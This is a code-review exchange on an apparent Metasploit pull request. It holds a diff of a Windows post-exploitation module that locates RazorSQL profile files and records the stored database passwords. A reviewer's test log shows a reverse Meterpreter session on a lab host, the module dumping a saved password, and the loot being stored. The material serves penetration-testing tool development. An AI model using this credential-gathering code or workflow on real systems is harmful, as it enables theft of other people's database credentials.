modules/post/windows/gather/credentials/razorsql.rb

```diff
@@ -30,6 +31,48 @@ def initialize(info={})
     ))
   end
 
+  def get_profiles
+    profiles = []
+    grab_user_profiles.each do |user|
+      next unless user['ProfileDir']
+      ['.razorsql\\data\\profiles.txt', 'AppData\Roaming\RazorSQL\data\profiles.txt'].each do |profile_path|
+        file = "#{user['ProfileDir']}\\#{profile_path}"
+        profiles << file if file?(file)
+      end
+    end
+
+    profiles
+  end
+
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
```

Comment:
It is what I got on testing. The password looks like encrypted so I guess the private_type should be `:nonreplayable_hash` ? Maybe add the `jtr_format` if iknown.

```
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49198) at 2015-06-12 11:16:29 -0500

meterpreter > run post/windows/gather/credentials/razorsql

[*] Checking All Users...
RazorSQL User Credentials
=========================

 Username  Password                                Type   Host       Port  Database Name  Database
 --------  --------                                ----   ----       ----  -------------  --------

 test      {{{VFWkNh3l3nYxvYzassfuNC8aw==!^*#$RIG  MySQL  127.0.0.1        test           MySQL

[*] User credentials stored in: /Users/jvazquez/.msf4/loot/20150612111643_razor_172.16.158.131_razor.user.creds_929859.txt
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > creds
Credentials
===========

host            service        public  private                                 realm  private_type
----            -------        ------  -------                                 -----  ------------
172.16.158.131  0/tcp (MySQL)  test    {{{VFWkNh3l3nYxvYzassfuNC8aw==!^*#$RIG         Password
```